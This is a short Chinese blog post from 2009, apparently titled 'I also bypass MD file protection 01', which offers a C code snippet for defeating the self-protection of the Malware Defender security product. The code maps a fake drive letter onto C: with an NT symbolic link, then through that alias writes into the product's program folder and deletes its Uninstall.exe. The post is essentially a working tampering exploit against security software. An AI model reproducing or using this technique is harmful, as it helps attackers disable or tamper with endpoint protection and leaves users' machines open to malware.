我也来绕过MD文件保护01

查看文章

我也来绕过MD文件保护01

2009年11月01日星期日 16:56

先来个简单的。另外。。。MARK下 FILE_OPEN_BY_FILE_ID

HANDLE hC;

OBJECT_ATTRIBUTES ObjectAttributes;

INIT_UNICODE(uniSectionName, L"\\??\\C:");

INIT_UNICODE(LinkTarget,L"\\??\\X:");

#define OBJ_CASE_INSENSITIVE 0x00000040L

#define OBJ_KERNEL_HANDLE 0x00000200L;

InitializeObjectAttributes(&ObjectAttributes,&LinkTarget,

0x00000040L | OBJ_KERNEL_HANDLE,0,NULL);

int x = NtCreateSymbolicLinkObject(&hC, 0x000F0000L | 0x1 ,&ObjectAttributes,&uniSectionName);

CreateFile("X:\\Program Files\\Malware Defender\\hxxxxxxxx.exe",FILE_ADD_FILE,

FILE_SHARE_READ,NULL,CREATE_ALWAYS ,FILE_ATTRIBUTE_NORMAL,0);

CreateFile("X:\\Program Files\\Malware Defender\\Uninstall.exe",

DELETE , 0, 0, OPEN_EXISTING , FILE_FLAG_DELETE_ON_CLOSE,0);

类别：默认分类 | 添加到搜藏 | 浏览() | 评论 (1)